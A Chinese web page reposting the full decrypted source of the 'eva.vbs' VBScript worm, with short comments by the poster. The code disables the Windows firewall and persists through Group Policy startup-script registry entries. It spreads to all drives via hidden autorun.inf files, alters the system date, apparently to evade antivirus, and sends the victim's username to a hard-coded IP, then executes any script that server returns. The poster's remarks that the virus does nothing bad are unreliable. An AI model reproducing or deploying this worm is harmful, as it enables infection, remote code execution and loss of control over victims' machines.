减小字体
增大字体- ·上一篇文章:机器狗变种Trojan-Downloader.Win32.EDog.af
- ·下一篇文章:administrator.vbs病毒及清除方法
- ·百度中搜索更多的关于“解密的eva.vbs 病毒代码”相关内容
- ·谷歌中搜索更多的关于“解密的eva.vbs 病毒代码”相关内容
- ******申明******
- 本站文章内容有部分为收录网络中其他网友内容,DOS资源站不保证所有的代码都适合你使用。
- 由于编辑匆忙,有可能造成某些脚本文件出现丢失代码或代码无法运行的情况,请网友根据情况自行修改。
- 如果能将出错部分反馈给我,那就更好了。
解密的eva.vbs 病毒代码
学习一下了,很少看到vbs的病毒的代码了。学习下。呵呵。病毒作者只是要找个工作,不容易啊。
知道了它都干什么了,我也懒的说怎么杀了。我又不是杀毒软件,我又不收费。
On Error Resume Next
Set FSO=CreateObject ("scRiPtiNG.fILeSystemObject")
Set WshShell=CreateObject( ("WscRipT.sheLl"))
Dim Dri_List,Dri_List0
Dim IsSend
IsSend=0
C_Time=Date()
WshShell.Run "net stop sharedaccess",0
Set Drvs=FSO.Drives
SysDir=FSO.GetSpecialFolder(1) '获得系统目录 参数 1:SystemFolder 决定这点
ThisPath=WScript.ScriptFullName
Set Fc=FSO.OpenTextFile(ThisPath,1)
sCopy=Fc.ReadAll
Fc.Close
Set Fc=Nothing
Call WriteFile(SysDir&"\SysInfo.reg", ("Windows Registry Editor Version 5.00
'下面的注册表文件是为了启动修改过的prncfg.vbs文件 此处为病毒的最大的特点
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
'我对比了一下没中毒的机器,发现只到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System下便没了后面的项了.
'只有个Allow-LogonScript-NetbiosDisabled 值为1
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
' "Scripts\Startup\0"这些内容也是正常的没有的.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"))
WshShell.Run "regedit /s SysInfo.reg",0
Wscript.Sleep 200
FSO.DeleteFile SysDir&"\SysInfo.reg",True
If Instr(ThisPath,SysDir)>0 then'如果在脚本在系统目录里 那么开始罪恶的感染o(∩_∩)o...
Dri_List0=ListDrv()
O_Time=Left(C_Time,3)&"4"&Right(C_Time,Len(C_Time)-4) '时间改为2004 干掉杀毒软件?
WshShell.Run "cmd /c Date "&O_Time,0
Wscript.Sleep 10000
For Dri_i=1 To Len(Dri_List0)
Call WriteAuto(Mid(Dri_List0,Dri_i,1)&":\")
Next
WshShell.Run "cmd /c Date "&C_Time,0
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colComputers = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
UserName=ObjComputer.username
Next
Do
If IsSend=0 Then
Set xml=CreateObject( ("MIcROSOft.xmlhtTp"))
xml.Open "GET","http://202.119.104.100/zzb/eva/count.asp?a="&UserName,0 '统计受害者,访问了下是一个什么ip是个政府的网站,估计是拿下来的站。
xml.Send()
If Err.Number=0 Then
IsSend=1
If Len(xml.responseText)>15 Then ExeCute xml.responseText
Else
Err.Clear
End If
Set xml=Nothing
End If
Dri_List=ListDrv()
For Dri_k=1 To Len(Dri_List)
If Instr(Dri_List0,Mid(Dri_List,Dri_k,1))<=0 Then
Call WriteAuto(Mid(Dri_List,Dri_k,1)&":\")
End If
Next
Dri_List0=Dri_List
Wscript.Sleep 1000
Loop
Else '运行病毒后在调用Explorer打开相应盘符,但是中毒者能明显到感觉延迟.建议病毒再改改,不过vbs有局限呀
WshShell.Run "Explorer .\"
Wscript.Sleep 500
WshShell.SendKeys "% X"
WshShell.AppActivate ("我的电脑")
Wscript.Sleep 100
WshShell.SendKeys "% C"
RunFlag=0
For each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If LCase(ps.name)="wscript.exe" Then
RunFlag=RunFlag+1
End If
Next
If RunFlag>=2 Then Wscript.quit
Set SF=FSO.GetFolder(SysDir)
F_Time=Left(SF.DateCreated,Instr(SF.DateCreated," ")-1)
WshShell.Run "cmd /c Date "&F_Time,0
Wscript.Sleep 100
Call WriteFile(SysDir&"\prncfg.vbs",sCopy) '向系统里的prncfg文件添加病毒内容
WshShell.Run "cmd /c Date "&C_Time,0
WshShell.Run SysDir&"\prncfg.vbs"
End If
Function ListDrv() '获得盘符
ExeCute ("Dim Tmp_List
Tmp_list=""
For Each Drv in Drvs
If Drv.IsReady Then
Tmp_List=Tmp_List&Drv.DriveLetter
End If
Next
ListDrv=Tmp_list")
End Function
Sub WriteAuto(Path)
ExeCute ("If FSO.FolderExists(Path&"autorun.inf") Then
FSO.MoveFolder Path&"autorun.inf",Path&Rnd()
ElseIf FSO.FileExists(Path&"autorun.inf") Then
FSO.DeleteFile Path&"autorun.inf",True
End If"
)
Call WriteFile(Path&"autorun.inf", ("[autorun]
open=
shell\n=更换图标
shell\open=打开(&O)
shell\open\Command=WScript.exe eva.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe eva.vbs"))
Call WriteFile(Path&"eva.vbs",sCopy)
End Sub
Sub WriteFile(fPath,Content)
ExeCute ("If FSO.FileExists(fPath) Then FSO.DeleteFile fPath,True
Set Fc=FSO.OpenTextFile(fPath,2,True)
Fc.Write Content
Fc.Close
Set Fc=Nothing
Set Fa=FSO.GetFile(fPath)
Fa.Attributes=7
Set Fa=Nothing")
End Sub
'I don't want to hurt you, but I just want an IT job
'Email:evar@live.cn
'呵呵,作者也不容易呀,病毒也没干什么坏事.
'呵呵呵通过这个vbs也学到了不少东西.:-)
